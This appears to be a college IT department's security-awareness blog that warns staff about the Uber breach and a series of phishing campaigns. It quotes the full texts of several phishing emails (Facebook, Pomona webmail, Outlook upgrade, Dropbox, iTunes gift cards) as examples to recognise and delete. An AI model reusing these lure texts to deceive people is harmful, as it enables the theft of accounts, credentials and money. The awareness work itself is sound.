Uber Data Breach

From Airplane, 1980

Dunn: Uh, Captain, I’m picking up an overheat in the computer core.
Clarence Oveur: How serious is it, Mr. Dunn?
Dunn: Uh, I can’t tell sir.
Clarence Oveur: Well you can tell me – I’m the Captain

What possible relevance could this quote have? Well…. Uber, the Ride company, had a massive data breach a year ago and evidently did not disclose the situation.

“Bloomberg was first to report that hackers stole the personal data of 57 million customers and drivers from Uber, a massive breach that the company concealed for more than a year. Finally, this week, they fired their chief security officer and one of his deputies for their roles in keeping the hack under wraps, which included a $100,000 payment to the attackers to “delete the data”.”

So that’s kind of serious. (The fine art of understatement.)

Suffice it to say that if you get email that references your Uber account, don’t click on the links.

[Phishing Alert] Fake Message from Facebook Security Stating You Violated a Policy

Facebook Security ImageFrom Facecrooks.com (Hint, if you have ANYONE friended on Facebook, make sure you add Facecrooks to your list!):

“Be on the lookout for the following bogus Facebook message from Facebook Security or “Faćebøøĸ Sẻƈurîƚy” as it is commonly displayed. Obviously, we aren’t talking about the real Facebook Security here. It is a phishing attempt to gain access to Facebook user accounts:

The Facebook message looks something like this:

Your account is reported to have violated a policy that is considered disruptive or insulting Facebook users. Until we http://www.facebook.com/security system will deactivate your account within 12 hours after you open this message if you do not confirm such reproductions.

Please confirm your facebook account below:

If you still want to use your account, please confirm your facebook account below:

(If the link is not clickable, try copy it into your browser.)

Note: we recommend to facebook users, asked to filling data that are complete and very accurate because we are from http://www.facebook.com/security team can ensure that the ownership of the account actually exists in your control and no that is using your Facebook account without permission.

Facebook Security ™

Another popular message is shown below:

WARNING : Your account is reported to have violated the policies that are considered annoying or insulting Facebook users.system will disable your account within 24 hours if you do not do the reconfirmation.

Notice how the scammers are using the authentic link to Facebook Security to make the ruse appear more legit. One BIG, red flag is that the verification link is to a third party Facebook application. We tried to follow the link, but this particular application has been removed by Facebook. You can be sure there are others that are active and in use.

[ALERT] This Scary New Phishing Attack Is Very Hard to Detect

For the purposes of expediency, I am simply going to paste in the article from knowbe4.com for you. You can also read it at the URL I paste in at the bottom of the post. You can read the full article here.

“You need to know about a new phishing attack vector reported by our friends at Barkly. It utilizes a new technique that’s just plain nasty.

This week, users at one of their customers began receiving emails from known contacts they had at another organization. In the screenshot below you can see that at least one of the emails appeared to be a reply to an existing email thread, where users at the two organizations had been emailing back and forth.

The new message was noticeably short — “Morning, please see attached and confirm” (you probably see where this is going) — but in the context of the email chain it was very convincing. The email appears to come from a person at a company the receiver has been emailing with, and this message appears to be a reply to a legit email chain. Yikes.

The aim was to have the user open the Word attachment, and follow instructions to enable macros.

Technical background of the attack

The user on the other end had been infected with a new variant of Ursnif, one of the most active and widespread banking Trojans in the world.

Investigation showed that the Word doc the user downloaded contained a macro that, when activated, launched PowerShell script designed to download the Ursnif payload.

Ursnif is a powerful trojan with a lot of features like stealing victim credentials in a variety of ways via man-in-the-browser attacks, keylogging, screenshot capture, etc.

It looks like the evil masterminds behind Ursnif are now taking it one step further and use the compromised email accounts of its victims to spread the infection like a worm.

It’s turning infected workstations into spam factories

What makes this social engineering attack so tricky is that the email pictured above wasn’t just coming from an organization the recipient knew and had been emailing with, it came as a reply to an existing email chain. That is a hard one for a user not to fall for, they really need to be on their toes to catch this one.

Ursnif isn’t the only trojan we’ve seen hijacking victim email accounts. In July, we saw the Emotet trojan doing something similar.

Now, compromised accounts have been a thing since email has been around, so getting a infected email from a trusted source is nothing new, but if this is becoming a larger trend it is even more important to mitigate before your own network starts spewing out malicious attacks and your mail server gets on blacklists. ”

While Pomona has a team and ITS is a team, this is not a Pomona team


Some of you have reported receiving the following email:

—–Original Message—–
From: Pomona Team [mailto:lunar@cybermesa.com]
Sent: Wednesday, November 08, 2017 10:41 AM
Subject: © 2017 Pomona Upgrade

Pomona College in Claremont, California
Remote Webmail Service
Information Systems & Services:
Click bellow link to upgrade
© 2017 Pomona Upgrade

Well, most of you have determined that it stinks like three day old phish.

Let’s see . . . where to begin:

The Sender is listed as “lunar@cybermesa.com”.
The Subject is “copyright symbol Pomona Upgrade”
The spelling in the body of the email is even worse than my usual spelling.
The link in the body of the email is completely unrelated to Pomona College.

So, if you see something from “Pomona Team” and it’s not related to football, ballroom dance, the ITS team, or many other teams with which you might already be familiar, just delete!


Netflix Scam! Think before you click!

There is a massive scam campaign going on, this time a very well executed Netflix phishing attack.

The scam targets subscribers telling them that their account is about to be canceled. The well-designed, personalized fake email convinces customers to update their account information to avoid suspension. This results in stolen personal and credit card information.

The email has the subject line “Your suspension notification” and includes a link where the subscriber is taken to a fake Netflix page which requires their log-in information as well as credit card number.

The scam was detected Sunday and it targets nearly 110 million Netflix subscribers. As mentioned, the fake site includes Netflix’s logo as well as popular Netflix shows like “The Crown” and “House of Cards” to make it seem legitimate.

When is “technical support” NOT “technical support”?

Answer: when it is unasked for!

Like manna from heaven, Khaireeman Shah Aman Shah sent a helpful email which informs the recipient that ALAS some of his emails were placed on hold. WELL, gosh darn it all. We really apologize for that one, oh goofy us. Just click here and all will be just as it should be…. that is, your identity will have been stolen.

If you receive the following email, please delete it. DO NOT CLICK where it tells you to CLICK!

From: Khaireeman Shah Aman Shah (FKPSB) [mailto:khaireeman.as@feldaglobal.com]
Sent: Friday, November 3, 2017 2:43 PM
To: Khaireeman Shah Aman Shah (FKPSB)
Subject: RE: Technical Support

A few of your incoming mails were placed on hold, in order to receive your messages kindly CLICK-HERE. We apologize for any inconveniences this process may have caused you and we appreciate your understanding.

You heard it here: “Almost too obvious to report”

Several of you have received the following email which is a complete phish. Please delete the email. It is not only a lie, it is a false lie! (A reference from “The King and I” by Rodgers and Hammerstein and a flash back to my days on stage.)

From: Khaireeman Shah Aman Shah (FKPSB) [mailto:khaireeman.as@feldaglobal.com]
Sent: Thursday, October 19, 2017 7:15 AM
To: Khaireeman Shah Aman Shah (FKPSB)
Subject: RE: Technical Support

Your account could not be automatically upgraded to the new Outlook Web App(OWA) 14.0.03. Kindly upgrade manually by visiting our UPGRADE-PAGE to avoid account deactivation.

This is doubly offensive as we are indeed going to upgrade our campus email system and we will be sending emails out from time to time about actions you may need to take. So this really does increase the workload and the worryload.

But, that’s my problem, not yours.

Just delete this email and, before I send you something similar, I will send you a notice that I’m going to send you a notice.

Beware Emails with Dropbox Links

There are quite a few variations of Dropbox phishing emails that we’ve seen. They normally tell you that there are documents available for you to download and they often look genuine. This one even has a disclaimer footer on the email.

Please, unless you know who sent it and you have verified with that person that they have sent it, just delete the email.

Just saw this one come out of the ether:

From: Dropbox̣ [notificationsonline@dropbox̣-online.com] [mailto:ave@dfakto.com]
Sent: Monday, October 16, 2017 9:19 AM
Subject: Documents Received – (2) Via Dropbox

You have new documents sent you to you via dropbox̣

182.7 KB Scanned_Invoice1392.Pdf

159.kb Investmentdetails0130.Pdf

View Documents
Download Documents

– The Dropbox̣ Team

+32 474905485
+32 2 290 63 95

Success factors for a successful transformation
This message contains confidential information and is intended only for the intended recipients. If you are not an intended recipient you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version.

iTunes Spearphishing Scam! Beware!


One of you just reported that you had received an email from someone at work here that looks something like the following:

Sent: Tuesday, October 3, 2017 9:03 AM
Subject: Itunes Gift Card

Hi ,
Can you help me arrange 10pieces of $100 iTunes gift cards.
Total of $1,000.
I need it urgently within today.
I will tell you more information about where it should be posted later.


If you have responded to this email, please go to mypassword.pomona.edu and change your password.